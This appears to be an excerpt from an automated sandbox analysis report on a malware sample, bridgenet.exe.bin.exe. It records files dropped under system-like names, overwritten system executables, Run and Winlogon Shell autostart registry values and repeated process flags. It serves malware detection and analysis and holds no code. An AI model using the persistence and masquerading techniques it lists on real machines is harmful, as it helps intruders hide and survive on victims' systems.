Source: bridgenet.exe.bin.exe	Static PE information: section name: .text entropy: 7.4472620832668825
Source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe.0.dr	Static PE information: section name: .text entropy: 7.4472620832668825
Source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe0.0.dr	Static PE information: section name: .text entropy: 7.4472620832668825
Source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe1.0.dr	Static PE information: section name: .text entropy: 7.4472620832668825
Source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe2.0.dr	Static PE information: section name: .text entropy: 7.4472620832668825
Source: dwm.exe.0.dr	Static PE information: section name: .text entropy: 7.4472620832668825

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe

File created: C:\Program Files\Internet Explorer\images\dwm.exe

Jump to dropped file

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe

File written: C:\Program Files\Internet Explorer\images\dwm.exe

Jump to behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe			Jump to behavior

Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	File created: C:\Users\user\Desktop\NpAnHTXs.log	Jump to dropped file
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	File created: C:\Users\user\Desktop\xQYgnzsS.log	Jump to dropped file
Source: C:\Program Files\Internet Explorer\images\dwm.exe	File created: C:\Users\user\Desktop\LwOexCEJ.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Users\user\Desktop\UOGmotWX.log	Jump to dropped file
Source: C:\Program Files\Internet Explorer\images\dwm.exe	File created: C:\Users\user\Desktop\ZdtVejrZ.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Program Files\Windows Photo Viewer\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Program Files\Windows Photo Viewer\en-GB\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Users\user\Desktop\BazpdGXT.log	Jump to dropped file
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	File created: C:\Users\user\Desktop\LfwFFKlf.log	Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Users\user\Desktop\ZmWTGheo.log	Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Program Files\Internet Explorer\images\dwm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Users\user\Desktop\LzBDVIdW.log	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe			Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe			Jump to dropped file

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Users\user\Desktop\LzBDVIdW.log	Jump to dropped file
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	File created: C:\Users\user\Desktop\xQYgnzsS.log	Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Users\user\Desktop\BazpdGXT.log	Jump to dropped file
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	File created: C:\Users\user\Desktop\LfwFFKlf.log	Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Users\user\Desktop\ZmWTGheo.log	Jump to dropped file
Source: C:\Program Files\Internet Explorer\images\dwm.exe	File created: C:\Users\user\Desktop\LwOexCEJ.log	Jump to dropped file
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	File created: C:\Users\user\Desktop\NpAnHTXs.log	Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File created: C:\Users\user\Desktop\UOGmotWX.log	Jump to dropped file
Source: C:\Program Files\Internet Explorer\images\dwm.exe	File created: C:\Users\user\Desktop\ZdtVejrZ.log	Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xvmLxyNtcnPgpmdKoWywaPsdXPf

Jump to behavior

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xvmLxyNtcnPgpmdKoWywaPsdXPf	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgenet.exe.bin	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm	Jump to behavior

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xvmLxyNtcnPgpmdKoWywaPsdXPf	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xvmLxyNtcnPgpmdKoWywaPsdXPf	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xvmLxyNtcnPgpmdKoWywaPsdXPf	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xvmLxyNtcnPgpmdKoWywaPsdXPf	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgenet.exe.bin	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgenet.exe.bin	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xvmLxyNtcnPgpmdKoWywaPsdXPf	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xvmLxyNtcnPgpmdKoWywaPsdXPf	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xvmLxyNtcnPgpmdKoWywaPsdXPf	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xvmLxyNtcnPgpmdKoWywaPsdXPf	Jump to behavior

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
